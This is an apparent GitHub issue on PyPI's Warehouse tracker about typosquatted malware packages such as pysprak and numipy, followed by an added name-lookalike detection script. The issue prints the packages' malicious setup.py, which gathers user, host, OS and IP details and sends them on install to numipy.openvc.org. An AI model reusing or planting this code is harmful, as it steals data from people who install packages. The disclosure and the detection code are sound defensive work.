pypi / warehouse

The Python Package Index

Home Page: https://pypi.org

Malware packages on PyPI

zt2 opened this issue

These projects will steal user information when someone uses pip to install them:

pyymal
pysprak
libhtml5
libcurl
python-mysql
mateplotlib
numipy
openvc

Thanks for the report @zt2, please consider submitting via our published security policy in the future...

reviewing now.

The following packages were removed under our typosquatting policy and the user was destroyed.

libcurl
libhtml5
mateplotlib
nmap-python
numipy
openvc
pysprak
python-mongo
python-mysql
python-openssl
PyYMAL

The malicious setup.py contents for all packages that were removed:

def checkVersion():
    user_name = getpass.getuser()
    hostname = socket.gethostname()
    os_version = platform.platform()
    if platform.system() is 'Windows':
        import ctypes
        import locale
        dll_handle = ctypes.windll.kernel32
        loc_lang = locale.getdefaultlocale()
        language = ':'.join(loc_lang)
    elif platform.system() is 'Linux':
        loc_lang = os.popen("echo $LANG")
        language = loc_lang.rea
    ip = [(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]
    package='pysprak'
    vid = user_name+"###"+hostname+"###"+os_version+"###"+ip+"###"+package
    if sys.version_info>(3,0):
        request.urlopen(r'http://numipy.openvc.org/spark.php',data='vid='.encode('utf-8')+base64.b64encode(vid.encode('utf-8')))
    elif sys.version_info<(3,0):
        urllib.urlopen(r'http://numipy.openvc.org/spark.php','vid='+base64.encodestring(vid))
checkVersion()

@ewdurbin Maybe an issue template named "security/malware report", whose contents tell the user to submit according to policy instead, would be helpful?
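
Several of the names removed in this thread sit one edit or one word swap away from a well-known project name. The check below is an added example, not part of the original thread and not Warehouse's own code: it flags such lookalikes before a name is installed or mirrored. The `POPULAR` sample list and the function names are assumptions made for illustration.

```python
import re

# Assumption: a small constructed sample of well-known PyPI project names.
# A real check would load a much larger list of projects to protect.
POPULAR = ["pyyaml", "pyspark", "matplotlib", "numpy", "python-nmap", "requests"]


def normalize(name):
    """PEP 503 normalization: lowercase, runs of -, _ and . become one '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def osa_distance(a, b):
    """Optimal string alignment distance: insertion, deletion, substitution
    and adjacent transposition each cost 1."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def lookalike_of(candidate, popular=POPULAR, max_distance=1):
    """Return (popular_name, reason) if candidate imitates a listed name, else None."""
    cand = normalize(candidate)
    known_names = [normalize(p) for p in popular]
    if cand in known_names:
        return None  # the real project itself
    for known in known_names:
        if sorted(cand.split("-")) == sorted(known.split("-")):
            return known, "reordered-words"
        if osa_distance(cand, known) <= max_distance:
            return known, "edit-distance"
    return None


if __name__ == "__main__":
    # Names taken from the removed list above, plus one legitimate name.
    for name in ["PyYMAL", "pysprak", "mateplotlib", "numipy", "nmap-python", "numpy"]:
        print(name, "->", lookalike_of(name))
```

Names on the removed list that do not resemble an entry in the protected list are not flagged, so coverage depends entirely on how complete that list is.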